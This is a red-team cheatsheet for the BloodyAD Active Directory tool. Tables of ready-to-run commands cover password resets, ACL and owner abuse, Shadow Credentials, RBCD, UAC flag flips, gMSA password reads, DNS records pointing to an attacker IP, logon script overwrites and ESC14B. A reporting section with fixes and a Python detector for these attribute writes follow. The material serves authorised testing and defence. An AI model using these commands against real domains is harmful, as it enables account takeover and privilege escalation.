πŸ›‘οΈ Methodology Checklist

  • Install via uv or pipx; keep it isolated from system Python
  • Confirm DC reachability and clock skew (Kerberos fails once drift exceeds 5 minutes)
  • Enumerate first: run get writable --detail to see what the controlled principal can actually change
  • Map the right action to the abuse: add genericAll / set owner / add shadowCredentials / add rbcd / set servicePrincipalName
  • Prefer Shadow Credentials over password reset when the user is active (resets are noisy)
  • Clean up: revert SPNs, drop added group memberships, remove shadowCredentials when done

🎯 Operational Context

Use when: You have valid AD credentials (password, hash, or Kerberos ticket) and want a single Python tool that handles enumeration, ACL abuse, UAC flag flips, RBCD, Shadow Credentials, DNS record planting, and tombstone restore, all over LDAP with no Windows host required.

Think Dumber First: BloodyAD is a Swiss-army knife. get writable --detail tells you what is possible; the verb (add / set / remove) tells you the action; the noun (genericAll, shadowCredentials, uac, rbcd, password, groupMember) tells you the abuse primitive.

Skip when: You need Windows-only tooling (Rubeus, PowerView in-memory) or you have no network path to LDAP/LDAPS on the DC.

⚡ Tactical Cheatsheet

Installation

| Command | Tactical Outcome |
|---|---|
| uv tool install bloodyAD | Install via uv (isolated, fast) |
| pipx install bloodyAD | Install via pipx (isolated venv) |

Enumeration

| Command | Tactical Outcome |
|---|---|
| bloodyAD --host [DC] -d [DOMAIN] -u [USER] -p [PASS] get object [TARGET_USER] | Retrieve all attributes of a user |
| bloodyAD --host [DC] -d [DOMAIN] -u [USER] -p [PASS] get writable --detail | List every object/attribute the controlled principal can write |
| bloodyAD --host [DC] -d [DOMAIN] -u [USER] -p [PASS] get writable --include-del | Include tombstoned objects in writable enumeration |
| bloodyAD --host [DC] -d [DOMAIN] -u [USER] -p [PASS] get bloodhound | Collect BloodHound data via BloodyAD |
| bloodyAD --host [DC] -d [DOMAIN] -u [USER] -p [PASS] get search -h | Show extended LDAP search operations |
| bloodyAD --host [DC] -d [DOMAIN] -u [USER] -p [PASS] -k get search -c 1.2.840.113556.1.4.2064 -c 1.2.840.113556.1.4.2065 | LDAP controls: display tombstoned objects |

Credential & Account Modifications

| Command | Tactical Outcome |
|---|---|
| bloodyAD --host [DC] -d [DOMAIN] -u [USER] -p [PASS] set password [TARGET_USER] [NEW_PASS] | Reset target user's password |
| bloodyAD --host [DC] -d [DOMAIN] -u [USER] -p [PASS] remove uac [TARGET_USER] -f ACCOUNTDISABLE | Enable a disabled account |
| bloodyAD --host [DC] -d [DOMAIN] -u [USER] -p [PASS] set object [OLD_UPN] userPrincipalName -v [NEW_UPN] | Modify userPrincipalName |
| bloodyAD --host [DC] -d [DOMAIN] -u [USER] -p [PASS] get object [TARGET_USER] --attr userPrincipalName | Verify UPN change |
| bloodyAD --host [DC] -d [DOMAIN] -u [USER] -p [PASS] set object [TARGET_USER] mail -v newmail@test.local | Modify mail attribute |

ACL & Privilege Abuse

| Command | Tactical Outcome |
|---|---|
| bloodyAD --host [DC] -d [DOMAIN] -u [USER] -p [PASS] add genericAll [DN] [TARGET_USER] | Grant target user GenericAll over object (by DN) |
| bloodyAD --host [DC] -d [DOMAIN] -u [USER] -p [PASS] add genericAll [SID] [TARGET_USER] | Grant target user GenericAll over object (by SID) |
| bloodyAD --host [DC] -d [DOMAIN] -u [USER] -p [PASS] set owner [TARGET_GROUP] [TARGET_USER] | WriteOwner → take over an object |
| bloodyAD --host [DC] -d [DOMAIN] -u [USER] -p [PASS] add shadowCredentials [TARGET] | Plant KeyCredentialLink → PKINIT → NT hash |
| bloodyAD --host [DC] -d [DOMAIN] -u [USER] -p [PASS] set object [TARGET] servicePrincipalName -v 'fake/spn' | WriteSPN → set up for Kerberoast |

UAC Flag Manipulation

| Command | Tactical Outcome |
|---|---|
| bloodyAD --host [DC] -d [DOMAIN] -u [USER] -p [PASS] remove uac [TARGET_USER] -f ACCOUNTDISABLE | Clear ACCOUNTDISABLE flag |
| bloodyAD --host [DC] -d [DOMAIN] -u [USER] -p [PASS] add uac [TARGET_USER] -f TRUSTED_TO_AUTH_FOR_DELEGATION | Set TRUSTED_TO_AUTH_FOR_DELEGATION (S4U2Self abuse) |

Group Operations

| Command | Tactical Outcome |
|---|---|
| bloodyAD --host [DC] -d [DOMAIN] -u [USER] -p [PASS] add groupMember [TARGET_GROUP] [NEW_MEMBER] | Add member to group |
| bloodyAD --host [DC] -d [DOMAIN] -u [USER] -p [PASS] set object [TARGET_GROUP] groupType -v -2147483644 | Change group type to Domain Local |

gMSA Password Recovery

| Command | Tactical Outcome |
|---|---|
| bloodyAD --host [DC] -d [DOMAIN] -u [USER] -p [PASS] get object [TARGET_USER] --attr msDS-ManagedPassword | Read gMSA managed password |
| bloodyAD --host [DC] -d [DOMAIN] -u [USER] -p [PASS] get search --filter '(sAMAccountName=[GMSA_NAME]$)' --attr 'msDS-ManagedPassword,msDS-ManagedPasswordId,sAMAccountName' --raw | Raw msDS-ManagedPassword blob via search filter |

MachineAccountQuota

| Command | Tactical Outcome |
|---|---|
| bloodyAD --host [DC] -d [DOMAIN] -u [USER] -p [PASS] get object 'DC=[DOMAIN],DC=[TLD]' --attr ms-DS-MachineAccountQuota | Enumerate MAQ |
| bloodyAD --host [DC] -d [DOMAIN] -u [USER] -p [PASS] set object 'DC=[DOMAIN],DC=[TLD]' ms-DS-MachineAccountQuota -v 10 | Set MAQ to 10 |

Object Lifecycle

| Command | Tactical Outcome |
|---|---|
| bloodyAD --host [DC] -d [DOMAIN] -u [USER] -p [PASS] add computer [COMPUTER] [COMPUTER_PASS] | Create a new computer account |
| bloodyAD --host [DC] -d [DOMAIN] -u [USER] -p [PASS] -k set restore [TARGET_USER] | Restore a deleted (tombstoned) object |

Delegation & Coercion Setup

| Command | Tactical Outcome |
|---|---|
| bloodyAD --host [DC] -d [DOMAIN] -u [USER] -p [PASS] add rbcd '[DELEGATE_TO]$' '[DELEGATE_FROM]$' | Add Resource-Based Constrained Delegation |
| bloodyAD --host [DC] -d [DOMAIN] -u [USER] -p [PASS] add dnsRecord [RECORD] [ATTACKER_IP] | Register a DNS record (relay / coercion targets) |
| bloodyAD --host [DC] -d [DOMAIN] -u [USER] -p [PASS] set object [DN] scriptPath -v [FILE] | Overwrite logon script path |

ESC14B (altSecurityIdentities)

| Command | Tactical Outcome |
|---|---|
| bloodyAD --host [DC] -d [DOMAIN] -u [USER] -p [PASS] set object [TARGET_USER] altSecurityIdentities -v 'X509:<RFC822>user@test.local' | Bind a certificate identity to a target user (ESC14B) |

πŸ“ Notes

  • Pass -k to use Kerberos authentication.
  • Pass an NT hash instead of a password using -p :[NTLM_HASH].
  • Specify the credential format for --password or -k using -f, e.g. -f rc4.

πŸ› οΈ Troubleshooting & Edge Cases

| Problem | Cause | Fix |
|---|---|---|
| LDAP bind fails over plaintext | DC enforces LDAP signing / channel binding | Use --ldaps, or Kerberos with -k |
| KRB_AP_ERR_SKEW | Clock drift > 5 min from DC | sudo ntpdate [DC] or sudo rdate -n [DC] |
| add computer fails with quota error | ms-DS-MachineAccountQuota exhausted for this user | Use a different account or raise MAQ if you have rights on the domain object |
| add shadowCredentials fails | DC has no NTAuth cert / PKINIT not configured | Fall back to targeted Kerberoast or password reset |
| get writable returns nothing | Stale BloodHound data: rights were revoked or principal lacks reach | Re-enumerate with a different ingestion path; check inheritance and explicit DENY |
| set restore fails | User missing the Reanimate-Tombstones extended right | Use a principal with that right (typically Domain Admins) |

πŸ“ Reporting Trigger

Finding Title: Active Directory Object Modification Permissions Enable Privilege Escalation via BloodyAD

Impact: Excessive write permissions across AD objects allow lower-privileged principals to perform ACL abuse, plant Shadow Credentials, configure RBCD, modify UAC flags, register DNS records, and restore tombstoned objects, all from a single Python tool with no Windows host required.

Root Cause: Permissions delegated without least-privilege review; non-zero ms-DS-MachineAccountQuota; missing LDAP signing / channel binding; lack of monitoring for msDS-KeyCredentialLink, servicePrincipalName, and userAccountControl modifications.

Recommendation: Audit writable attributes on Tier 0 objects. Set ms-DS-MachineAccountQuota = 0. Enforce LDAP signing + channel binding. Alert on KeyCredentialLink writes, SPN changes, UAC flag toggles (TRUSTED_TO_AUTH_FOR_DELEGATION), and RBCD additions.
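The monitoring half of the recommendation, as an added example (not BloodyAD's code or output): a small Python triage script over Directory Service change records. The record shape is a constructed simplification of Windows Security Event 5136, which logs one attribute value per event with an operation type of Value Added or Value Deleted; the sample records, principal names, DNs and values are all constructed. The script maps each attribute that the primitives above write (msDS-KeyCredentialLink, msDS-AllowedToActOnBehalfOfOtherIdentity, servicePrincipalName, altSecurityIdentities, scriptPath, ms-DS-MachineAccountQuota, nTSecurityDescriptor, member) to the technique it enables, and decodes userAccountControl before/after values so a toggle such as TRUSTED_TO_AUTH_FOR_DELEGATION is reported by flag name instead of as the raw integer 16777728. The UAC bit values are the documented ADS_USER_FLAG_ENUM constants.

```python
"""Triage Directory Service change records for the attribute writes the
BloodyAD primitives on this page produce.

Added example; not part of BloodyAD. The record shape is a constructed
simplification of Windows Security Event 5136 (one attribute value per event,
operation "Value Added" or "Value Deleted"); all sample values are made up.
"""
from __future__ import annotations

from dataclasses import dataclass

# userAccountControl bits (subset of ADS_USER_FLAG_ENUM).
UAC_FLAGS = {
    0x0000002: "ACCOUNTDISABLE",
    0x0000200: "NORMAL_ACCOUNT",
    0x0010000: "DONT_EXPIRE_PASSWORD",
    0x0080000: "TRUSTED_FOR_DELEGATION",
    0x0400000: "DONT_REQ_PREAUTH",
    0x1000000: "TRUSTED_TO_AUTH_FOR_DELEGATION",
}

# Flag toggles worth an alert on their own (others are usually routine admin).
HIGH_RISK_UAC = {
    "ACCOUNTDISABLE",
    "TRUSTED_FOR_DELEGATION",
    "TRUSTED_TO_AUTH_FOR_DELEGATION",
    "DONT_REQ_PREAUTH",
}

# Attribute written by each abuse primitive on this page -> technique it enables.
WATCHED_ATTRIBUTES = {
    "msDS-KeyCredentialLink": "Shadow Credentials (add shadowCredentials)",
    "msDS-AllowedToActOnBehalfOfOtherIdentity": "RBCD (add rbcd)",
    "servicePrincipalName": "SPN write / targeted Kerberoast",
    "altSecurityIdentities": "Certificate identity mapping (ESC14B)",
    "scriptPath": "Logon script overwrite",
    "ms-DS-MachineAccountQuota": "MachineAccountQuota change",
    "nTSecurityDescriptor": "ACL or owner change (add genericAll / set owner)",
    "member": "Group membership change (add groupMember)",
}


@dataclass(frozen=True)
class Alert:
    subject: str      # principal that performed the write
    object_dn: str    # object that was modified
    attribute: str
    technique: str
    detail: str


def decode_uac(value: int) -> set[str]:
    """Names of the known flags set in a userAccountControl value."""
    return {name for bit, name in UAC_FLAGS.items() if value & bit}


def uac_diff(old: int, new: int) -> tuple[set[str], set[str]]:
    """(flags added, flags removed) when userAccountControl changes old -> new."""
    before, after = decode_uac(old), decode_uac(new)
    return after - before, before - after


def analyze(events: list[dict]) -> list[Alert]:
    """Walk records in order and return one Alert per suspicious write.

    A userAccountControl change arrives as a 'Value Deleted' record carrying
    the old value followed by a 'Value Added' record carrying the new value;
    the old value is held per object until its matching add arrives. If no
    delete preceded the add, the old value is taken as 0, so every flag in
    the new value is reported as added.
    """
    alerts: list[Alert] = []
    previous_uac: dict[str, int] = {}
    for ev in events:
        attr, op, dn = ev["attribute"], ev["operation"], ev["object_dn"]
        if attr == "userAccountControl":
            value = int(ev["value"])
            if op == "Value Deleted":
                previous_uac[dn] = value
                continue
            added, removed = uac_diff(previous_uac.pop(dn, 0), value)
            if (added | removed) & HIGH_RISK_UAC:
                alerts.append(Alert(ev["subject"], dn, attr, "UAC flag toggle",
                                    f"added={sorted(added)} removed={sorted(removed)}"))
        elif attr in WATCHED_ATTRIBUTES:
            # Both directions matter: the add is the abuse, the delete is the
            # clean-up step from the checklist and confirms it was deliberate.
            alerts.append(Alert(ev["subject"], dn, attr, WATCHED_ATTRIBUTES[attr],
                                f"{op}: {ev['value'][:48]}"))
    return alerts


# Constructed records; names, DNs and values are not from any real domain.
SAMPLE_EVENTS = [
    {"subject": "CORP\\helpdesk1", "object_dn": "CN=Jane Doe,OU=Users,DC=corp,DC=local",
     "attribute": "displayName", "operation": "Value Added", "value": "Jane Doe"},
    {"subject": "CORP\\jdoe", "object_dn": "CN=svc-backup,OU=Service,DC=corp,DC=local",
     "attribute": "msDS-KeyCredentialLink", "operation": "Value Added",
     "value": "B:828:<constructed KeyCredential blob>:CN=svc-backup,OU=Service,DC=corp,DC=local"},
    {"subject": "CORP\\jdoe", "object_dn": "CN=svc-web,OU=Service,DC=corp,DC=local",
     "attribute": "userAccountControl", "operation": "Value Deleted", "value": "512"},
    {"subject": "CORP\\jdoe", "object_dn": "CN=svc-web,OU=Service,DC=corp,DC=local",
     "attribute": "userAccountControl", "operation": "Value Added", "value": "16777728"},
    {"subject": "CORP\\jdoe", "object_dn": "CN=SRV01,OU=Servers,DC=corp,DC=local",
     "attribute": "msDS-AllowedToActOnBehalfOfOtherIdentity", "operation": "Value Added",
     "value": "<constructed security descriptor granting S-1-5-21-0-0-0-1105>"},
    {"subject": "CORP\\jdoe", "object_dn": "CN=svc-sql,OU=Service,DC=corp,DC=local",
     "attribute": "servicePrincipalName", "operation": "Value Added", "value": "fake/spn"},
]


if __name__ == "__main__":
    for a in analyze(SAMPLE_EVENTS):
        print(f"[{a.technique}] {a.subject} -> {a.object_dn} ({a.attribute}): {a.detail}")
```

Run against the constructed records it yields four alerts (the displayName edit is ignored): the KeyCredentialLink plant, the UAC change reported as added=['TRUSTED_TO_AUTH_FOR_DELEGATION'], the RBCD descriptor write, and the SPN write. In a real pipeline the same logic would be fed from 5136 events exported by the SIEM, with the watch list extended to dnsNode objects for add dnsRecord and a baseline of which principals are expected to touch Tier 0 objects at all.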